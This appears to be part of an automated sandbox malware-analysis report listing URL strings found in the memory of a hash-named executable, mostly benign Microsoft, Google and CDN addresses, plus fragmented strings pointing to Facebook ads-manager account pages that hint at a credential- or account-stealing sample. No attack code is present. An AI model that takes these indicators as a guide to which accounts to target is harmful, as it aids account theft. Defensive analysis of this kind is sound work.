Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.317161423.00000000043A8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350872397.0000000005F49000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: d.3.dr	String found in binary or memory: https://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_333%2Cw_311%2Cc_fill%2Cg_faces:aut
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347021081.0000000005568000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349233494.0000000005569000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWeTGO?ver=8c74&q=90&m=
Source: d.3.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.434552345.0000000004359000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.425861993.0000000004177000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.487037473.0000000004148000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.472697671.0000000003FB1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.392029102.00000000042EF000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.434552345.0000000004359000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.425861993.0000000004177000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.487037473.0000000004148000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.472697671.0000000003FB1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.392029102.00000000042EF000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.342601892.0000000005527000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.404937938.00000000041F8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/MeControl.js
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347021081.0000000005568000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349233494.0000000005569000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347021081.0000000005568000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349233494.0000000005569000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347021081.0000000005568000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349233494.0000000005569000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314775552.0000000004458000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350903113.0000000005F68000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.404281530.0000000004237000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.404320020.0000000004238000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314775552.0000000004458000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350851224.0000000005F69000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.404281530.0000000004237000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.404320020.0000000004238000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.341605504.0000000005668000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.345656135.0000000005668000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.535092916.0000000004340000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314267282.00000000044E9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.342452690.00000000054E8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349191582.0000000005669000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.307906562.0000000004490000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.428971263.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.449104366.0000000004431000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.536721197.0000000004341000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.307960313.0000000004491000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.499822636.0000000004261000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.499632698.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.389516118.00000000041E1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.388648532.00000000041E0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.403791587.0000000004301000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.477148014.00000000040A0000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.341605504.0000000005668000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.345656135.0000000005668000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.535092916.0000000004340000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314267282.00000000044E9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.342452690.00000000054E8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349191582.0000000005669000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.307906562.0000000004490000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.428971263.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.449104366.0000000004431000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.536721197.0000000004341000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.307960313.0000000004491000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.499822636.0000000004261000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.499632698.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.389516118.00000000041E1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.388648532.00000000041E0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.403791587.0000000004301000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.477148014.00000000040A0000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351442378.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.534169378.0000000004350000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.344677569.0000000004640000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351258305.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.344525230.00000000045C8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351574992.00000000043C8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349448406.00000000045C9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351358120.0000000006061000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.376499389.0000000004648000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347640015.0000000004647000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349340871.0000000004649000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351338476.0000000006059000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.381221387.0000000006060000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351426457.0000000006091000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347603038.0000000004645000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351521194.0000000006090000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351295568.0000000006031000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.494535680.0000000003F71000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.476014082.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://pki.goog/repository/0
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.341605504.0000000005668000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.345656135.0000000005668000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.535092916.0000000004340000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314267282.00000000044E9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.342452690.00000000054E8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349191582.0000000005669000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.307906562.0000000004490000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.428971263.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.449104366.0000000004431000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.536721197.0000000004341000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.307960313.0000000004491000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.499822636.0000000004261000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.499632698.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.389516118.00000000041E1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.388648532.00000000041E0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.403791587.0000000004301000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.477148014.00000000040A0000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.317161423.00000000043A8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350872397.0000000005F49000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314775552.0000000004458000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350903113.0000000005F68000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.404281530.0000000004237000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.404320020.0000000004238000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314775552.0000000004458000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350903113.0000000005F68000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.404281530.0000000004237000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.404320020.0000000004238000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=623d43496a394c99b1336ff5cc139eb9&c=MSN&d=http%3A%2F%2Fwww.msn
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350812643.0000000005F89000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.378627597.0000000004628000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314788638.000000000445F000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351030426.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.534169378.0000000004350000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.427314817.0000000004271000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314386543.0000000004318000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.315604691.00000000046A8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.345761182.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350109741.00000000054C1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.344075897.0000000005660000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349535722.0000000004569000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.378961153.0000000005788000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.449348521.0000000004538000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.348622528.0000000004588000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.356313014.0000000005EC8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.449269503.0000000004518000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350029876.0000000005561000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.342304556.00000000055C0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.548108146.0000000004330000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.450258248.00000000044D8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.348384849.0000000005560000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.288845746.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.319616320.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.567209729.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.335812596.0000000002F90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.facetings/account_biisEnterpriseBusibook.com/ads/manis_prepay_accounager/account_setk
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.288845746.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.319616320.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.567209729.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.335812596.0000000002F90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.facetings/account_biisEnterpriseBusibook.com/ads/manis_prepay_accounager/account_setkern
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.315338055.0000000004620000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349965840.00000000059C9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.315319449.0000000004600000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349943307.00000000057A9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349918817.0000000005789000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.450013295.0000000004498000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.379088320.00000000059C8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.317161423.00000000043A8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350872397.0000000005F49000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.317161423.00000000043A8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350872397.0000000005F49000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=299872286.1601476511
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.430815949.0000000004228000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.538472349.0000000004190000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.484514622.0000000004050000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.396915274.0000000004270000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/
Source: d.3.dr	String found in binary or memory: https://www.google.com/chrome/
Source: d.3.dr	String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351620176.00000000060C9000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
